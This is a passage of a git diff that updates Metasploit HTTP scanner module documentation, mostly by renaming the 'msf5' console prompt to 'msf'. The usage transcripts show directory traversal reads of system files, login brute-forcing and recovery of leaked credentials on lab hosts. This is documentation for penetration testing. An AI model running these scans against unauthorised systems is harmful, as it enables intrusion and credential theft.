auxiliary(scanner/http/citrix_dir_traversal) > ``` ## References diff --git a/documentation/modules/auxiliary/scanner/http/dicoogle_traversal.md b/documentation/modules/auxiliary/scanner/http/dicoogle_traversal.md index 95cea4a0fe..00a1030834 100644 --- a/documentation/modules/auxiliary/scanner/http/dicoogle_traversal.md +++ b/documentation/modules/auxiliary/scanner/http/dicoogle_traversal.md @@ -19,12 +19,12 @@ successfully tested against Windows targets. ### Tested on Windows 2012 with Dicoogle 2.5.0 on Java 8 update 151 ``` - msf5 > use auxiliary/scanner/http/dicoogle_traversal - msf5 auxiliary(scanner/http/dicoogle_traversal) > set rhosts 1.1.1.1 + msf > use auxiliary/scanner/http/dicoogle_traversal + msf auxiliary(scanner/http/dicoogle_traversal) > set rhosts 1.1.1.1 rhosts => 1.1.1.1 - msf5 auxiliary(scanner/http/dicoogle_traversal) > set verbose true + msf auxiliary(scanner/http/dicoogle_traversal) > set verbose true verbose => true - msf5 auxiliary(scanner/http/dicoogle_traversal) > run + msf auxiliary(scanner/http/dicoogle_traversal) > run [+] 192.168.2.164:8080 - ; for 16-bit app support [fonts] diff --git a/documentation/modules/auxiliary/scanner/http/docker_version.md b/documentation/modules/auxiliary/scanner/http/docker_version.md index b1316c2ec0..a58ea3b6d8 100644 --- a/documentation/modules/auxiliary/scanner/http/docker_version.md +++ b/documentation/modules/auxiliary/scanner/http/docker_version.md @@ -11,12 +11,12 @@ Enable this to dump all info to the screen. ## Usage ``` -msf5 > use auxiliary/scanner/http/docker_version -msf5 auxiliary(scanner/http/docker_version) > set rhosts 127.0.0.1 +msf > use auxiliary/scanner/http/docker_version +msf auxiliary(scanner/http/docker_version) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 auxiliary(scanner/http/docker_version) > set verbose true +msf auxiliary(scanner/http/docker_version) > set verbose true verbose => true -msf5 auxiliary(scanner/http/docker_version) > run +msf auxiliary(scanner/http/docker_version) > run [*] Identifying Docker Server Version on 127.0.0.1:2375 [+] [Docker Server] Version: 18.03.1-ce @@ -24,5 +24,5 @@ msf5 auxiliary(scanner/http/docker_version) > run [*] Saving host information. [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/http/docker_version) > +msf auxiliary(scanner/http/docker_version) > ``` diff --git a/documentation/modules/auxiliary/scanner/http/enum_wayback.md b/documentation/modules/auxiliary/scanner/http/enum_wayback.md index a9ad76966a..96fba2aa3d 100644 --- a/documentation/modules/auxiliary/scanner/http/enum_wayback.md +++ b/documentation/modules/auxiliary/scanner/http/enum_wayback.md @@ -7,10 +7,10 @@ during a web assessment. Finding unlinked and old pages. This module utilizes ## Usage ``` -msf5 > use auxiliary/scanner/http/enum_wayback -msf5 auxiliary(scanner/http/enum_wayback) > set domain rapid7.com +msf > use auxiliary/scanner/http/enum_wayback +msf auxiliary(scanner/http/enum_wayback) > set domain rapid7.com domain => rapid7.com -msf5 auxiliary(scanner/http/enum_wayback) > run +msf auxiliary(scanner/http/enum_wayback) > run [*] Pulling urls from Archive.org [*] Located 43656 addresses for rapid7.com diff --git a/documentation/modules/auxiliary/scanner/http/f5_mgmt_scanner.md b/documentation/modules/auxiliary/scanner/http/f5_mgmt_scanner.md index 76ee63ffb6..6f4b4d44f5 100644 --- a/documentation/modules/auxiliary/scanner/http/f5_mgmt_scanner.md +++ b/documentation/modules/auxiliary/scanner/http/f5_mgmt_scanner.md @@ -24,7 +24,7 @@ This module attempts to identify the web management interfaces of the following ### BigIP 15.1.0.2 Virtual-Edition ``` - msf5 auxiliary(scanner/http/f5_mgmt_scanner) > run + msf auxiliary(scanner/http/f5_mgmt_scanner) > run [+] F5 BigIP web management interface found [*] Scanned 1 of 1 hosts (100% complete) diff --git a/documentation/modules/auxiliary/scanner/http/fortimail_login_bypass_detection.md b/documentation/modules/auxiliary/scanner/http/fortimail_login_bypass_detection.md index d87b13bae5..03c3e1319e 100644 --- a/documentation/modules/auxiliary/scanner/http/fortimail_login_bypass_detection.md +++ b/documentation/modules/auxiliary/scanner/http/fortimail_login_bypass_detection.md @@ -20,7 +20,7 @@ Tested against the following versions of FortiMail: ## Scenarios ``` -msf5 auxiliary(scanner/http/fortimail_login_bypass_detection) > run +msf auxiliary(scanner/http/fortimail_login_bypass_detection) > run [*] Checking vulnerability at 172.16.144.198 [+] 172.16.144.198 - Vulnerable version of FortiMail detected diff --git a/documentation/modules/auxiliary/scanner/http/fortinet_ssl_vpn.md b/documentation/modules/auxiliary/scanner/http/fortinet_ssl_vpn.md index 07414d6452..a3ea0e7ae1 100644 --- a/documentation/modules/auxiliary/scanner/http/fortinet_ssl_vpn.md +++ b/documentation/modules/auxiliary/scanner/http/fortinet_ssl_vpn.md @@ -19,7 +19,7 @@ The module supports several hosts at the same time. IP-Addresses have been masked with x ``` -msf5 auxiliary(scanner/http/fortinet_ssl_vpn) > run +msf auxiliary(scanner/http/fortinet_ssl_vpn) > run [+] xxxx:xxxx:xxxx:xxxx::4:443 - Server is responsive... [+] xxxx:xxxx:xxxx:xxxx::4:443 - Application appears to be Fortinet SSL VPN. Module will continue. @@ -37,4 +37,4 @@ msf5 auxiliary(scanner/http/fortinet_ssl_vpn) > run [*] Scanned 2 of 2 hosts (100% complete) [*] Auxiliary module execution completed -``` \ No newline at end of file +``` diff --git a/documentation/modules/auxiliary/scanner/http/git_scanner.md b/documentation/modules/auxiliary/scanner/http/git_scanner.md index b1b24b706d..aab9c684db 100644 --- a/documentation/modules/auxiliary/scanner/http/git_scanner.md +++ b/documentation/modules/auxiliary/scanner/http/git_scanner.md @@ -52,12 +52,12 @@ root@kali:/var/www/html# service apache2 start ### Metasploit git on Kali ``` -msf5 > use auxiliary/scanner/http/git_scanner -msf5 auxiliary(scanner/http/git_scanner) > set rhosts 127.0.0.1 +msf > use auxiliary/scanner/http/git_scanner +msf auxiliary(scanner/http/git_scanner) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 auxiliary(scanner/http/git_scanner) > set TARGETURI /metasploit-framework/.git/ +msf auxiliary(scanner/http/git_scanner) > set TARGETURI /metasploit-framework/.git/ TARGETURI => /metasploit-framework/.git/ -msf5 auxiliary(scanner/http/git_scanner) > run +msf auxiliary(scanner/http/git_scanner) > run [+] http://127.0.0.1/metasploit-framework/.git/ - git repo (version 2) found with 10064 files [+] http://127.0.0.1/metasploit-framework/.git/config - git config file found diff --git a/documentation/modules/auxiliary/scanner/http/goahead_traversal.md b/documentation/modules/auxiliary/scanner/http/goahead_traversal.md index bb4d269645..8e095efb0a 100644 --- a/documentation/modules/auxiliary/scanner/http/goahead_traversal.md +++ b/documentation/modules/auxiliary/scanner/http/goahead_traversal.md @@ -103,12 +103,12 @@ root@kali:/tmp/goahead-3.4.1# build/linux-x64-default/bin/goahead --verbose --ho Install from the instructions at the top of this document. ``` -msf5 > use auxiliary/scanner/http/goahead_traversal -msf5 auxiliary(scanner/http/goahead_traversal) > set rhosts 127.0.0.1 +msf > use auxiliary/scanner/http/goahead_traversal +msf auxiliary(scanner/http/goahead_traversal) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 auxiliary(scanner/http/goahead_traversal) > set depth 5 +msf auxiliary(scanner/http/goahead_traversal) > set depth 5 depth => 5 -msf5 auxiliary(scanner/http/goahead_traversal) > run +msf auxiliary(scanner/http/goahead_traversal) > run root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin diff --git a/documentation/modules/auxiliary/scanner/http/http_hsts.md b/documentation/modules/auxiliary/scanner/http/http_hsts.md index 0bd0883df1..0de70150a4 100644 --- a/documentation/modules/auxiliary/scanner/http/http_hsts.md +++ b/documentation/modules/auxiliary/scanner/http/http_hsts.md @@ -104,15 +104,15 @@ Finally, execute the following commands: Install using following instructions for Ubuntu listed above. ``` -msf5 > use auxiliary/scanner/http/http_hsts -msf5 auxiliary(scanner/http/http_hsts) > set RHOSTS 192.168.90.91 +msf > use auxiliary/scanner/http/http_hsts +msf auxiliary(scanner/http/http_hsts) > set RHOSTS 192.168.90.91 RHOSTS => 192.168.90.91 -msf5 auxiliary(scanner/http/http_hsts) > run +msf auxiliary(scanner/http/http_hsts) > run [+] 192.168.90.91:443 - Strict-Transport-Security:max-age=63072000; includeSubdomains [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/http/http_hsts) > +msf auxiliary(scanner/http/http_hsts) > ``` diff --git a/documentation/modules/auxiliary/scanner/http/http_sickrage_password_leak.md b/documentation/modules/auxiliary/scanner/http/http_sickrage_password_leak.md index d67d1bae80..c9cce8e220 100644 --- a/documentation/modules/auxiliary/scanner/http/http_sickrage_password_leak.md +++ b/documentation/modules/auxiliary/scanner/http/http_sickrage_password_leak.md @@ -45,10 +45,10 @@ ### Tested on Windows 7 x86 ``` - msf5 > use auxiliary/scanner/http/http_sickrage_password_leak - msf5 auxiliary(scanner/http/http_sickrage_password_leak) > set RHOSTS 192.168.37.130 + msf > use auxiliary/scanner/http/http_sickrage_password_leak + msf auxiliary(scanner/http/http_sickrage_password_leak) > set RHOSTS 192.168.37.130 RHOSTS => 192.168.37.130 - msf5 auxiliary(scanner/http/http_sickrage_password_leak) > run + msf auxiliary(scanner/http/http_sickrage_password_leak) > run [+] git username: myUsername [+] git password: myPassword @@ -61,5 +61,5 @@ [+] Email username: sickrage@sickrage.com [+] Email password: sickragepass [*] Auxiliary module execution completed - msf5 auxiliary(scanner/http/http_sickrage_password_leak) > + msf auxiliary(scanner/http/http_sickrage_password_leak) > ``` diff --git a/documentation/modules/auxiliary/scanner/http/httpdasm_directory_traversal.md b/documentation/modules/auxiliary/scanner/http/httpdasm_directory_traversal.md index 43d8295bd7..a358dadcf0 100644 --- a/documentation/modules/auxiliary/scanner/http/httpdasm_directory_traversal.md +++ b/documentation/modules/auxiliary/scanner/http/httpdasm_directory_traversal.md @@ -44,10 +44,10 @@ ### Tested on Windows XP x86 ``` - msf5 > use auxiliary/scanner/http/httpdasm_directory_traversal - msf5 auxiliary(scanner/http/httpdasm_directory_traversal) > set rhosts 192.168.37.128 + msf > use auxiliary/scanner/http/httpdasm_directory_traversal + msf auxiliary(scanner/http/httpdasm_directory_traversal) > set rhosts 192.168.37.128 rhosts => 192.168.37.128 - msf5 auxiliary(scanner/http/httpdasm_directory_traversal) > run + msf auxiliary(scanner/http/httpdasm_directory_traversal) > run [boot loader] timeout=30 @@ -56,5 +56,5 @@ multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [*] Auxiliary module execution completed - msf5 auxiliary(scanner/http/httpdasm_directory_traversal) > + msf auxiliary(scanner/http/httpdasm_directory_traversal) > ``` diff --git a/documentation/modules/auxiliary/scanner/http/iis_internal_ip.md b/documentation/modules/auxiliary/scanner/http/iis_internal_ip.md index 26d44d382f..f3d91f83bb 100644 --- a/documentation/modules/auxiliary/scanner/http/iis_internal_ip.md +++ b/documentation/modules/auxiliary/scanner/http/iis_internal_ip.md @@ -21,17 +21,17 @@ IP address in then body ### IIS with SSL ``` -msf5 > use auxiliary/scanner/http/iis_internal_ip -msf5 auxiliary(scanner/http/iis_internal_ip) > set ssl true +msf > use auxiliary/scanner/http/iis_internal_ip +msf auxiliary(scanner/http/iis_internal_ip) > set ssl true [!] Changing the SSL option's value may require changing RPORT! ssl => true -msf5 auxiliary(scanner/http/iis_internal_ip) > set rport 443 +msf auxiliary(scanner/http/iis_internal_ip) > set rport 443 rport => 443 -msf5 auxiliary(scanner/http/iis_internal_ip) > set rhosts 2.2.2.2 +msf auxiliary(scanner/http/iis_internal_ip) > set rhosts 2.2.2.2 rhosts => 2.2.2.2 -msf5 auxiliary(scanner/http/iis_internal_ip) > set verbose true +msf auxiliary(scanner/http/iis_internal_ip) > set verbose true verbose => true -rmsf5 auxiliary(scanner/http/iis_internal_ip) > run +rmsf auxiliary(scanner/http/iis_internal_ip) > run [*] 2.2.2.2:443 - Requesting GET / HTTP/1.0 [+] Location Header: https://10.1.1.20/home @@ -48,4 +48,4 @@ rmsf5 auxiliary(scanner/http/iis_internal_ip) > run - https://www.exploit-db.com/exploits/20096 - https://support.microsoft.com/en-us/help/218180/internet-information-server-returns-ip-address-in-http-header-content - https://support.microsoft.com/en-us/help/967342/fix-the-internal-ip-address-of-an-iis-7-0-server-is-revealed-if-an-htt -- https://techcommunity.microsoft.com/t5/iis-support-blog/iis-web-servers-running-in-windows-azure-may-reveal-their/ba-p/826500 \ No newline at end of file +- https://techcommunity.microsoft.com/t5/iis-support-blog/iis-web-servers-running-in-windows-azure-may-reveal-their/ba-p/826500 diff --git a/documentation/modules/auxiliary/scanner/http/influxdb_enum.md b/documentation/modules/auxiliary/scanner/http/influxdb_enum.md index b1b128defb..072069d325 100644 --- a/documentation/modules/auxiliary/scanner/http/influxdb_enum.md +++ b/documentation/modules/auxiliary/scanner/http/influxdb_enum.md @@ -10,12 +10,12 @@ This module enumerates databases on InfluxDB using the REST API using the defaul ## Scenarios ``` -msf5 > use auxiliary/scanner/http/influxdb_enum -msf5 auxiliary(scanner/http/influxdb_enum) > set RHOST 172.25.65.20 +msf > use auxiliary/scanner/http/influxdb_enum +msf auxiliary(scanner/http/influxdb_enum) > set RHOST 172.25.65.20 RHOST => 172.25.65.20 -msf5 auxiliary(scanner/http/influxdb_enum) > set VERBOSE true +msf auxiliary(scanner/http/influxdb_enum) > set VERBOSE true VERBOSE => true -msf5 auxiliary(scanner/http/influxdb_enum) > run +msf auxiliary(scanner/http/influxdb_enum) > run [+] 172.25.65.20:8086 - Influx Version: 1.5.1 [+] 172.25.65.20:8086 - Influx DB Found: @@ -43,4 +43,4 @@ msf5 auxiliary(scanner/http/influxdb_enum) > run [+] File saved in: /Users/unix/.msf4/loot/20180423050119_default_172.25.65.20_influxdb.enum_623871.txt [*] Auxiliary module execution completed -``` \ No newline at end of file +``` diff --git a/documentation/modules/auxiliary/scanner/http/joomla_pages.md b/documentation/modules/auxiliary/scanner/http/joomla_pages.md index 87ef7f10bd..21104c511a 100644 --- a/documentation/modules/auxiliary/scanner/http/joomla_pages.md +++ b/documentation/modules/auxiliary/scanner/http/joomla_pages.md @@ -13,10 +13,10 @@ This module scans for Joomla Content Management System running on a web server f ## Usage ``` -msf5 > use auxiliary/scanner/http/joomla_pages -msf5 auxiliary(scanner/http/joomla_pages) > set rhosts 192.168.2.39 +msf > use auxiliary/scanner/http/joomla_pages +msf auxiliary(scanner/http/joomla_pages) > set rhosts 192.168.2.39 rhosts => 192.168.2.39 -msf5 auxiliary(scanner/http/joomla_pages) > run +msf auxiliary(scanner/http/joomla_pages) > run [+] Page Found: /robots.txt [+] Page Found: /administrator/index.php diff --git a/documentation/modules/auxiliary/scanner/http/joomla_plugins.md b/documentation/modules/auxiliary/scanner/http/joomla_plugins.md index 2811f08bc9..3d0abe70e4 100644 --- a/documentation/modules/auxiliary/scanner/http/joomla_plugins.md +++ b/documentation/modules/auxiliary/scanner/http/joomla_plugins.md @@ -6,10 +6,10 @@ The list can be found in [data/wordlists/joomla.txt](https://github.com/rapid7/m ## Usage ``` -msf5 > use auxiliary/scanner/http/joomla_plugins -msf5 auxiliary(scanner/http/joomla_plugins) > set rhosts 192.168.2.39 +msf > use auxiliary/scanner/http/joomla_plugins +msf auxiliary(scanner/http/joomla_plugins) > set rhosts 192.168.2.39 rhosts => 192.168.2.39 -msf5 auxiliary(scanner/http/joomla_plugins) > run +msf auxiliary(scanner/http/joomla_plugins) > run [+] Plugin: /?1.5.10-x [+] Plugin: /?1.5.11-x-http_ref diff --git a/documentation/modules/auxiliary/scanner/http/joomla_version.md b/documentation/modules/auxiliary/scanner/http/joomla_version.md index b4b1239036..e1d49d404e 100644 --- a/documentation/modules/auxiliary/scanner/http/joomla_version.md +++ b/documentation/modules/auxiliary/scanner/http/joomla_version.md @@ -5,10 +5,10 @@ This module scans for Joomla Content Management System running on a web server. ## Usage ``` -msf5 > use auxiliary/scanner/http/joomla_version -msf5 auxiliary(scanner/http/joomla_version) > set rhosts 192.168.2.39 +msf > use auxiliary/scanner/http/joomla_version +msf auxiliary(scanner/http/joomla_version) > set rhosts 192.168.2.39 rhosts => 192.168.2.39 -msf5 auxiliary(scanner/http/joomla_version) > run +msf auxiliary(scanner/http/joomla_version) > run [*] Server: Apache/2.4.29 (Ubuntu) [+] Joomla version: 3.8.2 diff --git a/documentation/modules/auxiliary/scanner/http/jupyter_login.md b/documentation/modules/auxiliary/scanner/http/jupyter_login.md index 864e674346..a05f62a95b 100644 --- a/documentation/modules/auxiliary/scanner/http/jupyter_login.md +++ b/documentation/modules/auxiliary/scanner/http/jupyter_login.md @@ -39,36 +39,36 @@ original IPython Notebook system. This module is compatible with both standard J ### Jupyter Notebook 4.3.0 With No Authentication Requirement ``` -msf5 > use auxiliary/scanner/http/jupyter_login -msf5 auxiliary(scanner/http/jupyter_login) > set RHOSTS 192.168.159.128 +msf > use auxiliary/scanner/http/jupyter_login +msf auxiliary(scanner/http/jupyter_login) > set RHOSTS 192.168.159.128 RHOSTS => 192.168.159.128 -msf5 auxiliary(scanner/http/jupyter_login) > set PASS_FILE /tmp/passwords.txt +msf auxiliary(scanner/http/jupyter_login) > set PASS_FILE /tmp/passwords.txt PASS_FILE => /tmp/passwords.txt -msf5 auxiliary(scanner/http/jupyter_login) > run +msf auxiliary(scanner/http/jupyter_login) > run [*] 192.168.159.128:8888 - The server responded that it is running Jupyter version: 4.3.0 [+] 192.168.159.128:8888 - No password is required. [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/http/jupyter_login) > +msf auxiliary(scanner/http/jupyter_login) > ``` ### Jupyter Notebook 6.0.2 With A Password Set ``` -msf5 > use auxiliary/scanner/http/jupyter_login -msf5 auxiliary(scanner/http/jupyter_login) > set RHOSTS 192.168.159.128 +msf > use auxiliary/scanner/http/jupyter_login +msf auxiliary(scanner/http/jupyter_login) > set RHOSTS 192.168.159.128 RHOSTS => 192.168.159.128 -msf5 auxiliary(scanner/http/jupyter_login) > set PASS_FILE /tmp/passwords.txt +msf auxiliary(scanner/http/jupyter_login) > set PASS_FILE /tmp/passwords.txt PASS_FILE => /tmp/passwords.txt -msf5 auxiliary(scanner/http/jupyter_login) > run +msf auxiliary(scanner/http/jupyter_login) > run [*] 192.168.159.128:8888 - The server responded that it is running Jupyter version: 6.0.2 [-] 192.168.159.128:8888 - LOGIN FAILED: :Password (Incorrect) [+] 192.168.159.128:8888 - Login Successful: :Password1 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/http/jupyter_login) > +msf auxiliary(scanner/http/jupyter_login) > ``` [1]: https://jupyter-notebook.readthedocs.io/en/stable/changelog.html#release-4-3 diff --git a/documentation/modules/auxiliary/scanner/http/limesurvey_zip_traversals.md b/documentation/modules/auxiliary/scanner/http/limesurvey_zip_traversals.md index 2667d12689..abdb3fed90 100644 --- a/documentation/modules/auxiliary/scanner/http/limesurvey_zip_traversals.md +++ b/documentation/modules/auxiliary/scanner/http/limesurvey_zip_traversals.md @@ -120,7 +120,7 @@ resource (lime41.rb)> md5sum ~/.msf4/loot/* 3cf5f3492b7c77a77f74124bb4ccb528 /home/h00die/.msf4/loot/20200408141208_default_2.2.2.2__407491.txt 3cf5f3492b7c77a77f74124bb4ccb528 /home/h00die/.msf4/loot/20200408141209_default_2.2.2.2__149900.txt 3cf5f3492b7c77a77f74124bb4ccb528 /home/h00die/.msf4/loot/20200408141209_default_2.2.2.2__611969.txt -msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > cat /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__164991.txt +msf auxiliary(scanner/http/limesurvey_zip_traversals) > cat /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__164991.txt [*] exec: cat /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__164991.txt root:x:0:0:root:/root:/bin/bash diff --git a/documentation/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.md b/documentation/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.md index 03cca6bd63..94a1d7603c 100644 --- a/documentation/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.md +++ b/documentation/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.md @@ -31,13 +31,13 @@ ## Scenarios ``` - msf5 > use auxiliary/scanner/http/manageengine_deviceexpert_user_creds - msf5 auxiliary(scanner/http/manageengine_deviceexpert_user_creds) > set rhosts 172.16.158.131 + msf > use auxiliary/scanner/http/manageengine_deviceexpert_user_creds + msf auxiliary(scanner/http/manageengine_deviceexpert_user_creds) > set rhosts 172.16.158.131 rhosts => 172.16.158.131 - msf5 auxiliary(scanner/http/manageengine_deviceexpert_user_creds) > check + msf auxiliary(scanner/http/manageengine_deviceexpert_user_creds) > check [+] 172.16.158.131:6060 - The target is vulnerable. [*] Checked 1 of 1 hosts (100% complete) - msf5 auxiliary(scanner/http/manageengine_deviceexpert_user_creds) > run + msf auxiliary(scanner/http/manageengine_deviceexpert_user_creds) > run [*] 172.16.158.131:6060 - Found weak credentials (admin:admin) @@ -51,7 +51,7 @@ [*] Credentials saved in: /Users/jvazquez/.msf4/loot/20140926165907_default_172.16.158.131_manageengine.dev_118155.txt [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed - msf5 auxiliary(scanner/http/manageengine_deviceexpert_user_creds) > creds 172.16.158.131 + msf auxiliary(scanner/http/manageengine_deviceexpert_user_creds) > creds 172.16.158.131 Credentials =========== diff --git a/documentation/modules/auxiliary/scanner/http/onion_omega2_login.md b/documentation/modules/auxiliary/scanner/http/onion_omega2_login.md index 6fbd0c3aa4..d94380da0f 100644 --- a/documentation/modules/auxiliary/scanner/http/onion_omega2_login.md +++ b/documentation/modules/auxiliary/scanner/http/onion_omega2_login.md @@ -41,12 +41,12 @@ root master ## Scenario ``` -msf5 > use auxiliary/scanner/http/onion_omega2_login -msf5 auxiliary(scanner/http/onion_omega2_login) > set RHOSTS 192.168.3.1 +msf > use auxiliary/scanner/http/onion_omega2_login +msf auxiliary(scanner/http/onion_omega2_login) > set RHOSTS 192.168.3.1 RHOSTS => 192.168.3.1 -msf5 auxiliary(scanner/http/onion_omega2_login) > set USERPASS_FILE something.txt +msf auxiliary(scanner/http/onion_omega2_login) > set USERPASS_FILE something.txt USERPASS_FILE => something.txt -msf5 auxiliary(scanner/http/onion_omega2_login) > run +msf auxiliary(scanner/http/onion_omega2_login) > run [*] Running for 192.168.3.1... [*] 192.168.3.1:80 - [ 1/16] - root:123456 - Failure diff --git a/documentation/modules/auxiliary/scanner/http/owa_login.md b/documentation/modules/auxiliary/scanner/http/owa_login.md index 8258e916b8..7c4ded54a0 100644 --- a/documentation/modules/auxiliary/scanner/http/owa_login.md +++ b/documentation/modules/auxiliary/scanner/http/owa_login.md @@ -15,7 +15,7 @@ be saved as potentially valid usernames unless we get a successful login. ## Scenarios ``` -msf5 auxiliary(scanner/http/owa_login) > run +msf auxiliary(scanner/http/owa_login) > run [*] webmail.hostingcloudapp.com:443 OWA - Testing version OWA_2013 [+] Found target domain: HOSTINGCLOUDAPP @@ -57,4 +57,4 @@ msf5 auxiliary(scanner/http/owa_login) > run [*] webmail.hostingcloudapp.com:443 OWA - FAILED LOGIN, BUT USERNAME IS VALID. 0.275251 'HOSTINGCLOUDAPP\bob' : 'fido': SAVING TO CREDS [*] Auxiliary module execution completed -``` \ No newline at end of file +``` diff --git a/documentation/modules/auxiliary/scanner/http/phpmyadmin_login.md b/documentation/modules/auxiliary/scanner/http/phpmyadmin_login.md index 0e3e6ef646..4fdd6d9321 100644 --- a/documentation/modules/auxiliary/scanner/http/phpmyadmin_login.md +++ b/documentation/modules/auxiliary/scanner/http/phpmyadmin_login.md @@ -18,19 +18,19 @@ ### Tested on PhpMyAdmin Versions 4.0.10.20, 4.5.0, 4.8.1, 4.8.2, 5.0 ``` - msf5 > use auxiliary/scanner/http/phpmyadmin_login - msf5 auxiliary(scanner/http/phpmyadmin_login) > set rhosts 192.168.37.151 + msf > use auxiliary/scanner/http/phpmyadmin_login + msf auxiliary(scanner/http/phpmyadmin_login) > set rhosts 192.168.37.151 rhosts => 192.168.37.151 - msf5 auxiliary(scanner/http/phpmyadmin_login) > set targeturi phpmyadmin-4.8.2/index.php + msf auxiliary(scanner/http/phpmyadmin_login) > set targeturi phpmyadmin-4.8.2/index.php targeturi => phpmyadmin-4.8.2/index.php - msf5 auxiliary(scanner/http/phpmyadmin_login) > set password password + msf auxiliary(scanner/http/phpmyadmin_login) > set password password password => password - msf5 auxiliary(scanner/http/phpmyadmin_login) > run + msf auxiliary(scanner/http/phpmyadmin_login) > run [*] PhpMyAdmin Version: 4.8.2 [+] 192.168.37.151:80 - Success: 'root:password' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed - msf5 auxiliary(scanner/http/phpmyadmin_login) > + msf auxiliary(scanner/http/phpmyadmin_login) > ``` diff --git a/documentation/modules/auxiliary/scanner/http/rips_traversal.md b/documentation/modules/auxiliary/scanner/http/rips_traversal.md index 7770cdfdc5..c29c949139 100644 --- a/documentation/modules/auxiliary/scanner/http/rips_traversal.md +++ b/documentation/modules/auxiliary/scanner/http/rips_traversal.md @@ -24,12 +24,12 @@ ## Scenarios ``` - msf5 > use auxiliary/scanner/http/rips_traversal - msf5 auxiliary(scanner/http/rips_traversal) > set rhosts 172.16.191.188 + msf > use auxiliary/scanner/http/rips_traversal + msf auxiliary(scanner/http/rips_traversal) > set rhosts 172.16.191.188 rhosts => 172.16.191.188 - msf5 auxiliary(scanner/http/rips_traversal) > set filepath /etc/hosts + msf auxiliary(scanner/http/rips_traversal) > set filepath /etc/hosts filepath => /etc/hosts - msf5 auxiliary(scanner/http/rips_traversal) > run + msf auxiliary(scanner/http/rips_traversal) > run  127.0.0.1        localhost    diff --git a/documentation/modules/auxiliary/scanner/http/springcloud_directory_traversal.md b/documentation/modules/auxiliary/scanner/http/springcloud_directory_traversal.md index 00eae85635..bfd3252a6c 100644 --- a/documentation/modules/auxiliary/scanner/http/springcloud_directory_traversal.md +++ b/documentation/modules/auxiliary/scanner/http/springcloud_directory_traversal.md @@ -24,10 +24,10 @@ hyness/spring-cloud-config-server:2.1.6.RELEASE \ ### Tested against Linux zero 4.15.0-48-generic #51-Ubuntu SMP x86_64 GNU/Linux ``` -msf5 auxiliary(scanner/http/springcloud_directory_traversal) > run +msf auxiliary(scanner/http/springcloud_directory_traversal) > run [+] File saved in: /Users/Dhiraj/.msf4/loot/20200619234552_default_[REDACTED]_springcloud.trav_785232.txt [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/http/springcloud_directory_traversal) > +msf auxiliary(scanner/http/springcloud_directory_traversal) > ``` diff --git a/documentation/modules/auxiliary/scanner/http/thinvnc_travesal.md b/documentation/modules/auxiliary/scanner/http/thinvnc_travesal.md index 939ffe65e8..5dcc4a4122 100644 --- a/documentation/modules/auxiliary/scanner/http/thinvnc_travesal.md +++ b/documentation/modules/auxiliary/scanner/http/thinvnc_travesal.md @@ -23,16 +23,16 @@ ### ThinVNC version 1.0b1 on Windows XP SP3 ``` - msf5 > use auxiliary/scanner/http/thinvnc_traversal - msf5 auxiliary(scanner/http/thinvnc_traversal) > set rhosts 172.16.123.123 + msf > use auxiliary/scanner/http/thinvnc_traversal + msf auxiliary(scanner/http/thinvnc_traversal) > set rhosts 172.16.123.123 rhosts => 172.16.123.123 - msf5 auxiliary(scanner/http/thinvnc_traversal) > run + msf auxiliary(scanner/http/thinvnc_traversal) > run [+] File ThinVnc.ini saved in: /root/.msf4/loot/20191017033828_default_172.16.123.123_thinvnc.traversa_713640.txt [+] Found credentials: admin:admin [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed - msf5 auxiliary(scanner/http/thinvnc_traversal) > + msf auxiliary(scanner/http/thinvnc_traversal) > ``` diff --git a/documentation/modules/auxiliary/scanner/http/title.md b/documentation/modules/auxiliary/scanner/http/title.md index e6c4af42f4..5ed82c8817 100644 --- a/documentation/modules/auxiliary/scanner/http/title.md +++ b/documentation/modules/auxiliary/scanner/http/title.md @@ -23,10 +23,10 @@ If set to `false`, will not store the captured information in notes. Use `notes ### Apache/2.4.38 inside a Docker container ``` -msf5 > use auxiliary/scanner/http/title -msf5 auxiliary(scanner/http/title) > set RHOSTS 172.17.0.2 +msf > use auxiliary/scanner/http/title +msf auxiliary(scanner/http/title) > set RHOSTS 172.17.0.2 RHOSTS => 172.17.0.2 -msf5 auxiliary(scanner/http/title) > run +msf auxiliary(scanner/http/title) > run [+] [172.17.0.2:80] [C:200] [R:] [S:Apache/2.4.38 (Debian)] LOCAL TESTING [*] Scanned 1 of 1 hosts (100% complete) diff --git a/documentation/modules/auxiliary/scanner/http/totaljs_traversal.md b/documentation/modules/auxiliary/scanner/http/totaljs_traversal.md index c7b7c6ca4c..68702c7013 100644 --- a/documentation/modules/auxiliary/scanner/http/totaljs_traversal.md +++ b/documentation/modules/auxiliary/scanner/http/totaljs_traversal.md @@ -47,12 +47,12 @@ Affecting total.js package, versions: ### Tested on Total.js framework 3.2.0 and Total.js CMS 12.0.0 ``` -msf5 > use auxiliary/scanner/http/totaljs_traversal -msf5 auxiliary(scanner/http/totaljs_traversal) > set RHOST 192.168.2.59 +msf > use auxiliary/scanner/http/totaljs_traversal +msf auxiliary(scanner/http/totaljs_traversal) > set RHOST 192.168.2.59 RHOST => 192.168.2.59 -msf5 auxiliary(scanner/http/totaljs_traversal) > set RPORT 8320 +msf auxiliary(scanner/http/totaljs_traversal) > set RPORT 8320 